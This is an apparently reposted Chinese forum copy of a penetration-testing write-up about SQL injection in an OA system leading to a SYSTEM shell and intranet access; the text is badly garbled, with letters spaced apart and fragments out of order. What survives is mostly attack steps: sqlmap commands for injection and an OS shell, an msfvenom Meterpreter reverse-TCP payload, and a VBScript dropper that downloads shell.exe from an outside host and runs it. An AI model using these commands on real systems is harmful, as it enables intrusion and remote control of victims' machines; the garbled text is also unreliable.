[18276] 2021-02-02_某OA系统从SYSTEM权限SQL注入到内网漫游

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-02-02_某OA系统从SYSTEM权限SQL注入到内网漫游 O A S Y S T E M S Q L H A C K   2 0 2 1 - 0 2 - 0 2   w o o j a y w o o j a y     h t t p s : / / b l o g . b l a n k s h e l l . c o m / 0 x 0 1   i n u r l O A I P . N E T S Q L a d m i n   . C T F
S Q L O A S Q L 0 x 0 2   B u r p S u i t e H T T P
    t e s t . t x t 使 s q l m a p   - r   t x t L o g i n = a d m i n % 2 7 s q l m a p   - u   h t t p : / / x . x . x . x / x x . a s p x   - - f o r m s
  e r r o r - b a s e d s t a c k   q u i r e s t i m e - b a s e d 0 x 0 3   S Q L s q l m a p   - u   h t t p : / / x . x . x . x / x x . a s p x   - - f o r m s   - - i s - d b a
n i c e D B A s h e l l s q l m a p   - u   h t t p : / / x . x . x . x / x x . a s p x   - - f o r m s   - - o s - s h e l l
N T / S Y S T E M 0 x 0 4   s h e l l   s h e l l v b s m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = x . x . x . x   L P O R T = x x x x   >   / v a r / w w w / h t m l / s h e l l . e x e S e t   p o s t = C r e a t e O b j e c t ( " M s x m l 2 . X M L H T T P " ) p o s t . O p e n   " G E T " , " h t t p : / / x . x . x . x / s h e l l . e x e " ' p o s t . S e n d ( ) S e t   a G e t   =   C r e a t e O b j e c t ( " A D O D B . S t r e a m " ) a G e t . M o d e   =   3 a G e t . T y p e   =   1 a G e t . O p e n ( ) ' 3 w s c r i p t . s l e e p   3 0 0 0
e c h o v b s I E   m e t a s p l o i t S Y S T E M s h e l l I P a G e t . W r i t e ( p o s t . r e s p o n s e B o d y ) ' a G e t . S a v e T o F i l e   " s h e l l . e x e " , 2 s t a r t   i e e . e x e
V M w a r e 0 x 0 5     S Q L
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则